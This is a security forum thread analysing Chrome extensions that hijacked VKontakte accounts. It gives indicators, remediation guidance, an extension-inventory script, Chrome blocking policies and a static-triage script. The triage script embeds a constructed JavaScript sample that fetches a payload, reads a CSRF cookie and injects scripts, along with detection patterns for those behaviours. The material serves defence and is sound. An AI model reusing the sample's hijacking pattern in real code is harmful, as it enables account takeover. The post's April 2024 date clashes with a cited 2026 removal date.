VK Styles: 500K Users Infected by Chrome Extensions That Hijack VKontakte Accounts

Khushal (thread author)

Apr 4, 2024


Half a million VKontakte users had their accounts silently hijacked. Their settings reset every 30 days. Automatically subscribed to groups they never chose. All through Chrome extensions that looked like simple VK customization tools.

This isn't just adware or a simple typosquat. This is active account manipulation - malware that:

  • Automatically subscribes users to the attacker's VK groups (75% probability on each session)
  • Resets account settings every 30 days to override user preferences
  • Manipulates CSRF tokens to bypass VK's security protections
  • Tracks donation status to gate features and monetize victims
  • Maintains persistent control through multi-stage code injection
The attacker? A single threat actor operating under the GitHub username 2vk, using VK's own social network to distribute malicious payloads and build a follower base through forced subscriptions.

 
This report is worth taking seriously because it describes a browser-extension threat that goes beyond “ads/redirects” and directly drives actions inside the victim’s VK account via injected scripts.

What the KOI report is claiming (and what makes it notable)

Extension IDs mentioned in the report (practical check)
If someone wants to quickly sanity-check whether they were exposed, have them open chrome://extensions, enable “Developer mode”, and compare IDs.

The KOI post lists these IDs, and Chrome-Stats also shows “VK Styles” was removed on 2026-02-06:

What to do if someone had one of these installed
Keep it boring and methodical (and assume Chrome Sync may reintroduce extensions/settings):

  • Remove the extension(s) completely (and any other VK-related “downloader/theme” extensions you don’t absolutely need).
  • In Chrome/Chromium: turn off Sync temporarily, then remove the extension(s), then review any other extensions with broad site access (“On all sites”).
  • Clear VK site data (cookies/storage) after removal, then re-login.
  • On VK: change password, enable 2FA if available, and revoke all active sessions/devices (log out everywhere). This matters because the extension’s power comes from running while you are authenticated.
  • Audit VK account state: groups/pages you’re subscribed to, “connected apps”/authorized services (if present), and any profile/settings that keep reverting.
  • Run a reputable on-demand scan (this threat is primarily in-browser, but scanning is still a reasonable hygiene step).

Why “removal from the Web Store” doesn’t fully solve it
Even when Google delists an extension, already-installed copies can remain on endpoints until the user/admin removes them. That’s why incident writeups like this often keep paying dividends for defenders: the real cleanup happens locally.

Sources
 
The shrewdest enemy doesn’t break in by force, but disguised as ornament. Handing over access is like giving the fortress key away for a smile. The strategy: distrust beauty that demands power. 🔑🎭🚫
 
Technical Analysis & Remediation

MITRE ATT&CK Mapping

  • T1189 – Drive-by Compromise (via Web Store distribution).
  • T1059.007 – Command and Scripting Interpreter: JavaScript.
  • T1539 – Steal Web Session Cookie (manipulation of CSRF tokens).
  • T1562.001 – Impair Defenses: Disable or Modify Tools (settings overrides).

CVE Profile
NVD Score: N/A (Feature Abuse) | CISA KEV

Status
Inactive.

Telemetry

Extension IDs

ceibjdigmfbbgcpkkdpmjokkokklodmc, mflibpdjoodmoppignjhciadahapkoch, lgakkahjfibfgmacigibnhcgepajgfdb, bndkfmmbidllaiccmpnbdonijmicaafn, pcdgkgbadeggbnodegejccjffnoakcoh.

File Size
Unknown (Not present in source telemetry).

String Literals
"'R-A-' + 843079 * 2" (Used to evade static string analysis), "vk.com/m0nda", "remixsec_redir".

C2 Architecture
The structure resembles a multi-stage dead-drop resolver. The extension fetches HTML metadata from hxxps://vk[.]com/m0nda, parses it for encoded payload locations (e.g., hxxps://2vk[.]github[.]io/-/), and executes the resulting GitHub-hosted payload in the user's browser.

Cookie Manipulation
The payload explicitly reads and manipulates the "remixsec_redir" cookie to bypass VK's Cross-Site Request Forgery (CSRF) protections, allowing unauthorized API calls.

Remediation - THE ENTERPRISE TRACK (NIST SP 800-61r3 / CSF 2.0)

Note
As Google Chrome and VKontakte are not default Windows OS components, the threat to baseline enterprise infrastructure is assessed as Theoretical/Low unless Chrome is actively deployed and users are permitted to install unapproved extensions.

GOVERN (GV) – Crisis Management & Oversight

  • Update Acceptable Use Policies (AUP) to explicitly prohibit the installation of unauthorized browser extensions on corporate assets.
  • Establish a software supply chain review board for browser extensions.

DETECT (DE) – Monitoring & Analysis

  • Query EDR/RMM telemetry for the presence of the identified Extension IDs (e.g., ceibjdigmfbbgcpkkdpmjokkokklodmc) across the fleet.
  • Monitor web proxy logs for anomalous traffic reaching hxxps://2vk[.]github[.]io or hxxps://an[.]yandex[.]ru/system/context.js originating from non-developer subnets.
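For the EDR/RMM query above, and as the scripted form of the chrome://extensions comparison suggested earlier in the thread, here is an added example written for this post; it is not tooling from the KOI report. It walks a Chrome "User Data" directory, reads each installed extension's manifest.json, and reports any extension whose ID is on the list in the Telemetry section. The default profile locations are assumptions for stock Chrome; pass other User Data paths as arguments for Chromium, Edge or Brave. With --demo it builds a constructed throwaway profile tree (fake manifests) so it can be tried offline.

```python
"""Inventory installed Chrome extensions and match them against this campaign's IDs.

Added example for this thread; not tooling from the KOI report.  Chrome stores a
Web Store install as
    <User Data>/<Profile>/Extensions/<32-char id>/<version>/manifest.json
and this script walks that layout.  Default User Data paths are assumptions for
stock Chrome; pass other paths on the command line.  --demo builds a constructed
throwaway profile so the script can be tried offline.
"""
import json
import os
import sys
import tempfile
from pathlib import Path

# Extension IDs from the Telemetry section of this post.
IOC_EXTENSION_IDS = frozenset({
    "ceibjdigmfbbgcpkkdpmjokkokklodmc",
    "mflibpdjoodmoppignjhciadahapkoch",
    "lgakkahjfibfgmacigibnhcgepajgfdb",
    "bndkfmmbidllaiccmpnbdonijmicaafn",
    "pcdgkgbadeggbnodegejccjffnoakcoh",
})


def default_user_data_dirs() -> list:
    """Assumed stock-Chrome 'User Data' roots for the current user."""
    home = Path.home()
    if sys.platform.startswith("win"):
        local = Path(os.environ.get("LOCALAPPDATA", home / "AppData" / "Local"))
        return [local / "Google" / "Chrome" / "User Data"]
    if sys.platform == "darwin":
        return [home / "Library" / "Application Support" / "Google" / "Chrome"]
    return [home / ".config" / "google-chrome", home / ".config" / "chromium"]


def inventory(user_data_dir: Path):
    """Yield one record per installed extension version under every profile."""
    for manifest in user_data_dir.glob("*/Extensions/*/*/manifest.json"):
        ext_id = manifest.parents[1].name
        # Web Store IDs are exactly 32 letters in the range a-p; skip anything else.
        if len(ext_id) != 32 or set(ext_id) - set("abcdefghijklmnop"):
            continue
        try:
            data = json.loads(manifest.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            data = {}
        perms = data.get("host_permissions", []) + data.get("permissions", [])
        yield {
            "profile": manifest.parents[3].name,
            "id": ext_id,
            "version": manifest.parent.name,
            "name": data.get("name", "?"),
            # Host patterns only: these say which sites the extension may script.
            "hosts": [p for p in perms
                      if isinstance(p, str) and ("://" in p or p == "<all_urls>")],
        }


def find_iocs(user_data_dir: Path) -> list:
    """Installed extensions whose ID is on the IOC list."""
    return [e for e in inventory(user_data_dir) if e["id"] in IOC_EXTENSION_IDS]


def build_demo_profile(root: Path) -> Path:
    """Constructed sample: one IOC extension and one benign one (fake manifests)."""
    user_data = root / "User Data"
    for ext_id, name, hosts in (
        ("ceibjdigmfbbgcpkkdpmjokkokklodmc", "VK Styles", ["*://*.vk.com/*"]),
        ("a" * 32, "Harmless Notes", []),
    ):
        version_dir = user_data / "Default" / "Extensions" / ext_id / "1.2.3_0"
        version_dir.mkdir(parents=True)
        (version_dir / "manifest.json").write_text(json.dumps({
            "manifest_version": 3, "name": name, "version": "1.2.3",
            "host_permissions": hosts}), encoding="utf-8")
    return user_data


def demo() -> dict:
    """Scan the constructed profile; returns counts so the result can be checked."""
    user_data = build_demo_profile(Path(tempfile.mkdtemp()))
    return {"total": len(list(inventory(user_data))), "hits": find_iocs(user_data)}


if __name__ == "__main__":
    if "--demo" in sys.argv:
        result = demo()
        hits = result["hits"]
        print(f"demo profile: {result['total']} extensions scanned")
    else:
        targets = [Path(a) for a in sys.argv[1:]] or default_user_data_dirs()
        hits = [h for t in targets if t.is_dir() for h in find_iocs(t)]
    for h in hits:
        print(f"IOC HIT {h['id']} {h['name']!r} v{h['version']} "
              f"profile={h['profile']} hosts={h['hosts']}")
    sys.exit(1 if hits else 0)  # non-zero so an RMM job can flag the host
```

Matching by ID only catches the five listed extensions; the hosts column is there so the same pass can surface any other extension that is allowed to script *.vk.com, which is the capability that made this campaign work.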

RESPOND (RS) – Mitigation & Containment

  • Push Group Policy Objects (GPO) or MDM profiles to forcibly remove the malicious Extension IDs and blocklist them via Chrome Enterprise policies.
  • Isolate any endpoints showing active C2 beaconing to the GitHub dead-drop repository.

RECOVER (RC) – Restoration & Trust

  • Invalidate and force-reset all active web session tokens (specifically targeting VKontakte if used for corporate communications).

IDENTIFY & PROTECT (ID/PR) – The Feedback Loop

  • Implement Chrome Enterprise ExtensionAllowlist policies, moving from a default-allow to a default-deny posture for all browser extensions.
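As a concrete form of the default-deny posture here and of the forced removal in the RESPOND step, the following is an added example of a Chrome managed-policy file (my example, not a KOI artefact). On Linux it would be dropped as /etc/opt/chrome/policies/managed/extensions.json (path assumed for stock Chrome); macOS and Windows deliver the same ExtensionSettings object through a configuration profile or the HKLM\SOFTWARE\Policies\Google\Chrome\ExtensionSettings registry string. The "*" entry blocks everything not explicitly listed, and "removed" uninstalls an already-installed copy, which is the part a plain blocklist does not do. The blocked_install_message text and the runtime_blocked_hosts entry are placeholders to adapt; the host entry stops every extension, approved or not, from injecting into the listed site.

```json
{
  "ExtensionSettings": {
    "*": {
      "installation_mode": "blocked",
      "blocked_install_message": "Browser extensions must be approved by IT security before installation.",
      "runtime_blocked_hosts": ["*://*.vk.com"]
    },
    "ceibjdigmfbbgcpkkdpmjokkokklodmc": { "installation_mode": "removed" },
    "mflibpdjoodmoppignjhciadahapkoch": { "installation_mode": "removed" },
    "lgakkahjfibfgmacigibnhcgepajgfdb": { "installation_mode": "removed" },
    "bndkfmmbidllaiccmpnbdonijmicaafn": { "installation_mode": "removed" },
    "pcdgkgbadeggbnodegejccjffnoakcoh": { "installation_mode": "removed" }
  }
}
```

Each approved extension then gets its own entry with "installation_mode": "allowed" (or "force_installed" plus an update_url for mandatory ones). After deployment, chrome://policy on an endpoint shows whether the object was parsed and applied; a typo in an ID silently leaves that extension in place.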

Remediation - THE HOME USER TRACK (Safety Focus)

Priority Constraint: Disconnection from the internet is NOT required as this is an application-layer (browser) threat, not a system-level worm or ransomware.

Priority 1: Safety

  • Do not log into banking, email, or social media accounts on the affected browser until the extension is removed.
  • Open Google Chrome, navigate to chrome://extensions/, and immediately "Remove" any extensions named "VK Styles" or matching the IDs listed in the telemetry above.

Priority 2: Identity

  • Using a known clean device (or the cleaned browser), log into VKontakte.
  • Navigate to VK settings, manually revert any forced configuration changes (e.g., feed sorting), and unsubscribe from unauthorized groups (specifically Group ID -168874636 / "VK Styles").
  • Terminate all active web sessions within VKontakte security settings to invalidate the stolen "remixsec_redir" CSRF tokens.

Priority 3: Persistence

  • Clear all browser cookies and cache (Time range: "All time") to ensure no residual malicious scripts or manipulated tokens remain.

Hardening & References

Baseline

CIS Benchmarks for Google Chrome (v130+).

Framework
NIST CSF 2.0 / SP 800-61r3.

Guidance
To mitigate runtime evaluation evasion (e.g., "'R-A-' + 843079 * 2"), prioritize behavioral endpoint monitoring over static string analysis. Enforce strict Content Security Policies (CSP) and Extension Manifest V3 compliance to limit an extension's ability to execute remotely hosted code.
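To make the "runtime evaluation evasion" point concrete: a grep for R-A-1686158 never matches the extension source, because the file only contains 'R-A-' + 843079 * 2 and the number exists only once the script runs. The following is an added example written for this thread (not the extension's code and not from the KOI report) that folds such constant expressions back into their runtime value, matches the string indicators the report publishes against both the raw source and the folded values, and flags the sinks a reviewer would look at next (cookie reads, dynamic code, runtime script injection, remote fetches). The sample JavaScript inside is constructed for the demo and only exercises those patterns.

```python
"""Static triage of a Chrome extension's JavaScript for the indicators in this post.

Added example, not the KOI report's or the extension's code.  It shows why a
plain grep misses 'R-A-' + 843079 * 2 (the final literal never appears in the
file) and how cheap constant folding recovers the runtime value.  The sample
input at the bottom is constructed for the demo; the IOC strings are the ones
the report lists.
"""
import ast
import operator
import re

# String IOCs from the "String Literals" / "C2 Architecture" / DETECT sections.
STRING_IOCS = (
    "vk.com/m0nda",
    "2vk.github.io",
    "remixsec_redir",
    "an.yandex.ru/system/context.js",
)

# Sinks worth a second look in any extension: cookie access, dynamic code,
# runtime <script> injection, and fetching content from a remote URL.
SINK_PATTERNS = {
    "cookie_read": re.compile(r"document\.cookie"),
    "dynamic_code": re.compile(r"\beval\s*\(|new\s+Function\s*\("),
    "script_injection": re.compile(r"""createElement\s*\(\s*['"]script['"]\s*\)"""),
    "remote_fetch": re.compile(r"""\bfetch\s*\(\s*['"]https?://"""),
}

# A string literal followed by '+' and a purely numeric expression,
# e.g. 'R-A-' + 843079 * 2 .  The character class stops at ';', ',' etc.
STRING_PLUS_ARITH = re.compile(
    r"""(['"])([^'"\\]*)\1\s*\+\s*((?:\d+|[\s()+\-*/])+)""")

_OPS = {ast.Add: operator.add, ast.Sub: operator.sub,
        ast.Mult: operator.mul, ast.Div: operator.truediv}


def fold_numeric(expr: str):
    """Constant-fold '843079 * 2' -> 1686158 without eval(): the expression is
    parsed with ast and only numbers and + - * / are evaluated; anything else
    (names, calls, attributes) returns None."""
    try:
        tree = ast.parse(expr.strip().rstrip(" +-*/"), mode="eval")
    except SyntaxError:
        return None

    def ev(node):
        if isinstance(node, ast.Expression):
            return ev(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](ev(node.left), ev(node.right))
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
            return -ev(node.operand)
        raise ValueError("unsupported node")

    try:
        return ev(tree)
    except (ValueError, ZeroDivisionError):
        return None


def js_number_to_str(n) -> str:
    """Approximate JS ToString for the numbers we fold (integral floats print as ints)."""
    if isinstance(n, float) and n.is_integer():
        n = int(n)
    return str(n)


def fold_string_concats(js: str) -> list:
    """[(source_text, resolved_value)] for every literal+arithmetic pattern that folds."""
    out = []
    for m in STRING_PLUS_ARITH.finditer(js):
        value = fold_numeric(m.group(3))
        if value is None:
            continue
        out.append((m.group(0).strip(), m.group(2) + js_number_to_str(value)))
    return out


def triage_source(js: str) -> dict:
    """One-shot triage: literal IOC hits, folded strings, and sink usage."""
    folded = fold_string_concats(js)
    # Search IOCs in the raw text *and* in the folded values, so an indicator
    # assembled at runtime still matches.
    haystack = js + "\n" + "\n".join(v for _, v in folded)
    return {
        "iocs": [s for s in STRING_IOCS if s in haystack],
        "folded_strings": folded,
        "sinks": [name for name, rx in SINK_PATTERNS.items() if rx.search(js)],
    }


def verdict(report: dict) -> str:
    """Any IOC hit is 'malicious'; folded strings or two or more sinks are 'suspicious'."""
    if report["iocs"]:
        return "malicious"
    if report["folded_strings"] or len(report["sinks"]) >= 2:
        return "suspicious"
    return "clean"


# Constructed sample, not code from the real extension: it only exercises the
# patterns above with the indicator strings the report publishes.
SAMPLE_JS = r"""
var blockId = 'R-A-' + 843079 * 2;   // the final id never appears as a literal
fetch("https://vk.com/m0nda").then(r => r.text()).then(stage2);
var tok = document.cookie.match(/remixsec_redir=([^;]+)/);
var s = document.createElement("script"); s.src = next; document.head.appendChild(s);
"""

if __name__ == "__main__":
    rep = triage_source(SAMPLE_JS)
    for key, val in rep.items():
        print(f"{key}: {val}")
    print("verdict:", verdict(rep))
```

The folding deliberately uses the ast module rather than eval(), so hostile source cannot execute anything on the analyst's machine; it only recovers the "string plus arithmetic" family the report describes, which is enough to turn a runtime-only indicator back into something a static rule can match.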

Source

Koi.ai